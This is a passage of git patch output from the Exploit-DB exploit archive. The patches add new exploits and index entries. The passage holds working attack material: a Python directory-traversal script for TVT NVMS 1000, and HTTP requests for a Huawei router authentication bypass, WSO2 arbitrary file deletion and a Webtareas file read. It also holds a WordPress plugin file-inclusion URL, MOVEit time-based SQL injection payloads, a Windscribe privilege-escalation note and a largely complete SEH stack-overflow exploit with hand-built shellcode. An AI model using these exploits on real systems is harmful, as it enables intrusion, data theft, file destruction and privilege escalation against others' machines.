STOP_PENDING +(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) +WIN32_EXIT_CODE : 0 (0x0) +SERVICE_EXIT_CODE : 0 (0x0) +CHECKPOINT : 0x4 +WAIT_HINT : 0x0 + +C:\Users\mgthura>sc start WindscribeService +[SC] StartService FAILED 1053: +The service did not respond to the start or control request in a timely fashion. + +Restarting service will cause the service to fail as the binary path +would not point into the actual executable of the service. +However the command will be executed successfully and the user will be +added to the local administrators group. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 600baaeaa..558ffa2fb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux, 48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows, +48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port 48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows, 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, +48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, +48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi, From a2581bc29f906646f05bf71886425b0d7a8cb3d0 Mon Sep 17 00:00:00 2001 From: chenrui Date: Sat, 11 Apr 2020 14:13:10 -0400 Subject: [PATCH 08/18] Fix bash script --- searchsploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/searchsploit b/searchsploit index 4de856bf8..75edc5ac2 100755 --- a/searchsploit +++ b/searchsploit @@ -1,4 +1,4 @@ -ech#!/bin/bash +#!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool # Version: 4.0.7 (2020-04-09) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k From be2aa5d840ffbdc0d72fbf7fc126f55cd32ed633 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 14 Apr 2020 05:01:51 +0000 Subject: [PATCH 09/18] DB: 2020-04-14 7 changes to exploits/shellcodes Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Huawei HG630 2 Router - Authentication Bypass TVT NVMS 1000 - Directory Traversal Webtateas 2.0 - Arbitrary File Read WSO2 3.1.0 - Arbitrary File Delete Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection --- exploits/hardware/webapps/48310.txt | 51 +++++ exploits/hardware/webapps/48311.py | 43 ++++ exploits/java/webapps/48313.txt | 146 +++++++++++++ exploits/php/webapps/48312.txt | 26 +++ exploits/php/webapps/48315.txt | 28 +++ exploits/php/webapps/48316.txt | 34 +++ exploits/windows/local/48314.py | 324 ++++++++++++++++++++++++++++ files_exploits.csv | 7 + 8 files changed, 659 insertions(+) create mode 100644 exploits/hardware/webapps/48310.txt create mode 100755 exploits/hardware/webapps/48311.py create mode 100644 exploits/java/webapps/48313.txt create mode 100644 exploits/php/webapps/48312.txt create mode 100644 exploits/php/webapps/48315.txt create mode 100644 exploits/php/webapps/48316.txt create mode 100755 exploits/windows/local/48314.py diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt new file mode 100644 index 000000000..61e7d2b48 --- /dev/null +++ b/exploits/hardware/webapps/48310.txt @@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py @@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt new file mode 100644 index 000000000..7ab57c008 --- /dev/null +++ b/exploits/java/webapps/48313.txt @@ -0,0 +1,146 @@ +# Title: WSO2 3.1.0 - Arbitrary File Delete +# Date: 2020-04-12 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A + + +Document Title: +=============== +WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) + + +##CVE not assigned yet + +##Security Update : https://apim.docs.wso2.com/en/latest/ + + +Common Vulnerability Scoring System: +==================================== +8.5 + + +Affected Product(s): +==================== +WSO2 API Manager Carbon Interface + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . +The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests +and to delete arbitrary System files. + +The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter +of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files +via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . + +The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. +Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. +Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. + +=============================== + +Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) + +[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. +org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d +eployment\server\registryextensions\commons-dir + at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j +ava:531) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( +OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO +peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out +InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.client.OperationClient.execute(OperationClient.java: +149) ~[axis2_1.6.1.wso2v38.jar:?] + at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem +oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte +nsions.stub_4.7.13.jar:?] + at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. +deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens +ions.ui_4.7.13.jar:?] + at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS +ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] + at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t +omcat_9.0.22.wso2v1.jar:?] + +*Error displayed in Web browser with body request: + + + + + +============================= + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp + +Vulnerable Parameter(s): +[+] extensionName + + +Server version + 3.0.0 + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) +2-attacker uploads any file .jar extension +3-attacker intercepts the request that follows and modifies the parameter with traversal string: + +--- PoC Session Logs [POST] --- + +POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 +Host: localhost:9443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS +Content-Length: 22 +Origin: https://localhost:9443 +Connection: close +Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu +Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions +Pragma: no-cache +Cache-Control: no-cache + +extensionName=../../../../INSTALL.txt + + ---------------Returned Headers in Response------------------ + +HTTP/1.1 200 +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +Content-Type: text/html;charset=UTF-8 +Content-Length: 10 +Date: Sat, 04 Jan 2020 00:55:38 GMT +Connection: close +Server: WSO2 Carbon Server \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt @@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt @@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt @@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py new file mode 100755 index 000000000..9a6660afb --- /dev/null +++ b/exploits/windows/local/48314.py @@ -0,0 +1,324 @@ +# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-11 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/freeclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) +# - Does not work on x64 version +# Version: Free Desktop Clock 3.0 +# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer + +############################### CRASH INFO ############################### +# [!] Access violation +# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 +# SEH chain of main thread +# Address SE handler +# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite +# 00410041 74737953 +# 69620C00 *** CORRUPT ENTRY *** +############################### CRASH INFO ############################### + +File = 'poc.txt' + +######################### EXPLOIT ENVIRONMENT INFO ######################### +#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' +#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' +#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) + +# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename +# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] +# 0x042b0000 | True | False | False | False | [Clock.dll] +######################### EXPLOIT ENVIRONMENT INFO ######################### + +os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] +# nSEH & SEH translated opcodes after Pop-Pop-Ret +# EB 00 jmp short +2 +# 05 00EB0043 add eax, 4300EB00 + +# GetPC to decode our decoder using Venetian Blinds technique +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Use Venetian Blinds technique to fix our mangled decoder +# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. +# +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +############################# ZIPPER DECODER ############################### +# Set EAX = First non-null byte of shellcode +# init: +# 1 | 50 | push eax # EAX = &Shellcode +# 2 | 5F | pop edi # EDI = Decoder Destination Base Address +# 3 | 47 | inc edi # First 0x00 byte of shellcode +# 4:5 | 33D2 | xor edx, edx +# 6:7 | 33C9 | xor ecx, ecx +# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter +# decodeLoop: +# 12:13 | 33DB | xor ebx, ebx +# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte +# 15 | 42 | inc edx # increment to next non-null byte +# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte +# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte +# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 +# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode +# 25 | 47 | inc edi +# 26 | 49 | dec ecx +# 27:28 | 74 02 | je short jmp2code +# 29:30 | ^ EB ED | jmp short decodeLoop +# jmp2code: +# 31 | 50 | push eax +# 32 | C3 | ret +################################################3########################### + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' +# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 + +# Note: These nop unicode instructions are actually [reg+0x00] not [reg] +# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes +# Use the 3 byte version for Venetian Blinds alignment + # Example: + # nasm > add [edx], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+00], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+01], dh + # 00000000 007201 add [edx+0x1],dh + # + This happens when typing in ASM commands into msf-nasm_shell and immunity + +## 2nd byte - \x00 => \x5F +venBlinds = '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 6th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66' # mov byte [eax], 0x66 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 14th byte - \x00 => \x42 +venBlinds += '\xC6\x42' # mov byte [eax], 0x42 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32' # mov byte [eax], 0x32 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 18th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49' # mov byte [eax], 0x49 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED' # mov byte [eax], 0xED +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 +venBlinds += '\x72' # add [edx], dh +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! + +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +#badChars = 00 0d 80 82->8e 91->9f +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6' # xor esi, esi +fKernel32 += '\xF7\xE6' # mul esi +fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB +fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR +fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll +fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll +fKernel32 += '\x50' # push eax +fKernel32 += '\x5E' # pop esi +fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll +fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 + 